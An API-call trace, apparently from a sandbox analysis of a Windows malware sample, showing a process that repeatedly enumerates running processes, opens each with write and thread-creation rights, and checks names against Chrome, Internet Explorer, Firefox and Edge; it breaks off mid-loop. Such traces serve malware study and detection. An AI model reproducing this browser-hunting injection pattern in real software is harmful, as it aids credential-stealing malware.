	[0213.581] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0213.582] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x411c
	[0213.582] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.582] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0213.582] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.582] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.583] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.583] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0213.583] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.583] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.583] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0213.584] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x4120
	[0213.584] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.584] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0213.584] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.584] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.585] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.585] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0213.585] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.585] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.585] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.586] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x4124
	[0213.586] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.586] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.586] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.586] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.587] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.587] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.587] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.587] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.587] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.588] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.589] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x4128
	[0213.589] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.589] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.590] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.590] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.590] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.590] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.590] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.590] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.591] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0213.591] CloseHandle (hObject=0x188) returned 1
	[0213.591] Sleep (dwMilliseconds=0x64) 
	[0213.691] GetCurrentProcessId () returned 0x110
	[0213.691] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0213.696] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0213.698] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0213.699] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0213.701] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x412c
	[0213.701] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.701] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0213.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.702] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.703] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.703] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0213.703] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.703] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.704] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0213.705] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x4130
	[0213.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.706] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0213.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.706] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.706] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0213.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.706] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.707] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0213.707] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x4134
	[0213.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.707] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0213.708] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.708] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.708] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.708] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0213.708] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.708] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.709] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0213.709] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x4138
	[0213.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.709] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0213.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.710] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.710] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0213.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.710] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.710] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0213.711] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x413c
	[0213.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.711] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0213.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.711] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.712] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0213.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.712] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.712] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0213.713] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x4140
	[0213.713] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.713] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0213.713] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.713] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.714] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0213.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.714] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.714] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0213.715] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x4144
	[0213.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.716] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0213.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.716] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.716] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0213.717] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.717] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.717] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0213.718] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x4148
	[0213.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.718] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0213.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.718] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.718] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0213.719] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.719] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.719] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.719] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x414c
	[0213.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.720] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.720] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.720] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.721] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.721] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.721] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.721] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x4150
	[0213.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.722] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.722] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.722] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.723] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.723] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.723] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.723] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x4154
	[0213.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.724] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.724] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.724] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.725] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.725] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.725] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.726] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x4158
	[0213.726] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.726] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.726] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.726] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.726] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.726] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.727] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.727] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.727] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.727] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x415c
	[0213.728] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.728] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.728] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.728] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.728] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.728] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.728] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.728] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.729] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.729] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x4160
	[0213.729] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.729] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.730] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.730] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.730] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.730] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.730] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.730] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.731] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.731] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x4164
	[0213.731] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.731] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.732] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.732] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.732] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.733] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0213.733] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x4168
	[0213.733] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.733] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0213.734] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.734] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.734] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.734] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0213.734] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.734] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.734] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.735] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x416c
	[0213.735] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.735] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.735] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.736] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.736] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.736] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.737] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.737] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.737] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0213.738] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x4170
	[0213.738] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.738] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.738] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.738] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.738] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.738] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.739] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.739] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.739] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0213.740] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x4174
	[0213.740] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.740] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0213.740] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.740] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.740] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.740] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0213.741] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.741] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.741] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.742] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x4178
	[0213.742] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.742] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.742] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.742] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.743] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
